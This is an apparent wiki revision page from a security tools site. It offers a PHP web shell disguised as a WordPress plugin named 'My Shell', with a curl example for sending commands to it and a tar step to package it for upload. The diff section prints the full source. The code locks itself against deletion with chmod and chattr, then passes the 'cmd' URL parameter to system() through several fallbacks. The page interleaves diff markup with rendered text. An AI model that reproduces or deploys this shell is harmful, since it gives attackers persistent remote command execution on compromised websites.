BlakSec

Latest revision as of 22:42, 17 July 2018

The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.

E.g.

curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"

Enough with intros so here's the code.

Moved Permanently. Redirecting to https://cdn.jsdelivr.net/gh/blaksec/sectools@master/webshells/wp_shell1.php

Now just tar it up and it's ready to go

tar -zcvf ./shell.tgz shell.php

@@ Line 1: / Line 1: @@
-<syntaxhighlight lang=php line>
+The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.
-<?php
-/**
- * @package My_Shell
- * @version 1.0
- */
-/*
-Plugin Name: My Shell
-Plugin URL: http://google.com
-Description: A quick shell plugin
-Author: ZeGnar
-Version: 1.0
- */
-# prevent file deletion
+E.g.
-$myfile = __FILE__;
+<syntaxhighlight lang=shell-session line>
-system("chmod ugo-w $myfile");
+curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"
-system("chattr +i $myfile");
+</syntaxhighlight>
-$command=urldecode($_GET["cmd"]);
-if (class_exists('ReflectionFunction')) {
+Enough with intros so here's the code.
-	$function = new ReflectionFunction('system');
+{{#github:webshells/wp_shell1.php|blaksec/sectools|master|php|line=1|start=1}}
-	$function->invoke($command);
-} elseif (function_exists('call_user_func_array')) {
-	call_user_func_array('system', array($command));
-} elseif (function_exists('call_user_func')) {
-	call_user_func('system', $command);
-} else {
-	system($command);
-}
-?>
+Now just tar it up and it's ready to go
+<syntaxhighlight  lang=shell-session highlight="" line>
+tar -zcvf ./shell.tgz shell.php
 </syntaxhighlight>